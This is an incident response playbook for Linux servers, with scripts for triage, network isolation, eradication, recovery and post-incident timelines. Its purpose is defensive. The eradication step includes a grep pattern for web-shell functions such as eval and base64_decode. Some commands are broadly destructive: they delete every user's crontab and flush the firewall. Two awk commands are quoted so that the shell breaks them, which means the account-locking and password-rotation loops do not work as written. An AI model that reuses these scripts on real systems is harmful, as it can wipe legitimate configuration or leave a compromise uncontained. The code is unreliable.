Incident Response Plan: Cybersecurity Playbook for Linux Teams (2026)

When a security incident occurs, the speed and effectiveness of your response determines the difference between a minor disruption and a catastrophic breach. An Incident Response Plan (IRP) provides structured procedures that enable your team to detect, contain, eradicate, and recover from security incidents systematically.

The 6 Phases of Incident Response

1. Preparation — Tools, training, and procedures ready before incidents occur
2. Detection & Analysis — Identifying and confirming security incidents
3. Containment — Limiting the scope and impact of the incident
4. Eradication — Removing the threat from all affected systems
5. Recovery — Restoring systems and verifying normal operations
6. Post-Incident — Lessons learned and process improvements

Phase 1: Preparation

Essential Toolkit

# Incident Response Toolkit - Install on all servers
sudo apt install -y \
  tcpdump wireshark-common nmap \
  strace ltrace lsof \
  volatility3 sleuthkit \
  chkrootkit rkhunter \
  auditd aide \
  netcat-openbsd socat

# Pre-configure audit rules
cat > /etc/audit/rules.d/incident-response.rules << EOF
-w /etc/passwd -p wa -k identity_change
-w /etc/shadow -p wa -k identity_change
-w /etc/sudoers -p wa -k privilege_change
-w /var/log/ -p wa -k log_tampering
-a exit,always -F arch=b64 -S execve -k command_exec
-a exit,always -F arch=b64 -S connect -k network_connect
-w /tmp -p x -k tmp_exec
-w /dev/shm -p x -k shm_exec
EOF
sudo systemctl restart auditd

Phase 2: Detection & Analysis

#!/bin/bash
# triage.sh - First responder triage script

echo "=== SYSTEM TRIAGE - $(date) ==="
echo "=== Hostname: $(hostname) ==="

echo -e "\n--- Active Users ---"
w
last -20

echo -e "\n--- Suspicious Processes ---"
ps auxf | grep -v "\[" | sort -k3 -rn | head -20

echo -e "\n--- Network Connections ---"
ss -tunapl | grep -v "127.0.0.1\|::1"

echo -e "\n--- Recently Modified Files ---"
find /etc /usr/bin /usr/sbin -mtime -1 -type f 2>/dev/null

echo -e "\n--- Scheduled Tasks ---"
for user in $(cut -f1 -d: /etc/passwd); do
    crontab -l -u $user 2>/dev/null | grep -v "^#"
done
cat /etc/crontab
ls -la /etc/cron.d/

echo -e "\n--- Failed Logins ---"
grep "Failed password" /var/log/auth.log | tail -20

echo -e "\n--- Listening Services ---"
ss -tlnp

echo -e "\n--- Rootkit Check ---"
chkrootkit 2>/dev/null | grep -i "infected"
rkhunter --check --skip-keypress 2>/dev/null | grep -i "warning"

Phase 3: Containment

#!/bin/bash
# containment.sh - Isolate compromised system

echo "WARNING: This will isolate the system from the network!"
read -p "Continue? (yes/no): " CONFIRM
if [ "$CONFIRM" != "yes" ]; then exit 1; fi

# Save current network state for forensics
ip addr show > /tmp/network-state-before.txt
ip route show >> /tmp/network-state-before.txt
ss -tunapl >> /tmp/network-state-before.txt

# Block all network traffic except forensics workstation
FORENSICS_IP="10.0.0.100"
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
iptables -A INPUT -s $FORENSICS_IP -j ACCEPT
iptables -A OUTPUT -d $FORENSICS_IP -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

echo "System isolated. Only $FORENSICS_IP can connect."
logger "INCIDENT: System isolated by $(whoami) at $(date)"

# Disable compromised accounts
for user in $(lastlog --time 1 | awk "NR>1{print $1}"); do
    if [ "$user" != "root" ] && [ "$user" != "$(whoami)" ]; then
        passwd -l $user
        echo "Locked account: $user"
    fi
done

Phase 4: Eradication

# Find and remove malicious artifacts

# Check for backdoors
find / -name "*.php" -newer /var/log/syslog -exec grep -l "eval\|base64_decode\|exec\|system\|passthru" {} \; 2>/dev/null

# Check for unauthorized SSH keys
for dir in /home/*/.ssh /root/.ssh; do
    if [ -f "$dir/authorized_keys" ]; then
        echo "=== $dir/authorized_keys ==="
        cat "$dir/authorized_keys"
    fi
done

# Check for persistence mechanisms
systemctl list-unit-files --type=service | grep enabled
ls -la /etc/systemd/system/*.service
cat /etc/rc.local 2>/dev/null
find /etc/init.d -type f -newer /var/log/syslog

# Remove malicious cron jobs
for user in $(cut -f1 -d: /etc/passwd); do
    crontab -r -u $user 2>/dev/null
done

# Verify system binary integrity
debsums -c 2>/dev/null | head -20

Phase 5: Recovery

# Systematic recovery procedure

# 1. Restore from known-good backup
borg extract /backup/borg-repo::last-known-good-$(date -d "2 days ago" +%Y-%m-%d)

# 2. Reinstall critical packages
apt install --reinstall openssh-server nginx postgresql coreutils

# 3. Rotate ALL credentials
passwd root
for user in $(awk -F: "$3 >= 1000 {print $1}" /etc/passwd); do
    passwd $user
done

# 4. Regenerate SSH host keys
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server

# 5. Rotate application secrets
# Database passwords, API keys, SSL certificates

# 6. Verify system integrity
aide --check
rkhunter --check

# 7. Restore network access gradually
iptables -F
# Apply hardened firewall rules
/etc/iptables/apply-hardened-rules.sh

Phase 6: Post-Incident Analysis

# Generate timeline of events
ausearch --start "2026-04-10" --end "2026-04-11" -i > /forensics/audit-timeline.txt

# Analyze authentication logs
grep -E "Accepted|Failed|session opened|session closed" /var/log/auth.log \
  | sort > /forensics/auth-timeline.txt

# Create incident report template
cat > /forensics/incident-report.md << "EOF"
# Incident Report

## Summary
- **Date Detected:** 
- **Date Contained:** 
- **Date Resolved:** 
- **Severity:** Critical / High / Medium / Low
- **Type:** Ransomware / Data Breach / Unauthorized Access / DDoS

## Timeline
| Time | Event | Action Taken |
|------|-------|-------------|
|      |       |             |

## Root Cause Analysis
## Impact Assessment  
## Remediation Actions Taken
## Lessons Learned
## Recommendations
EOF

Download our Incident Response Cheat Sheet for a printable quick-reference guide.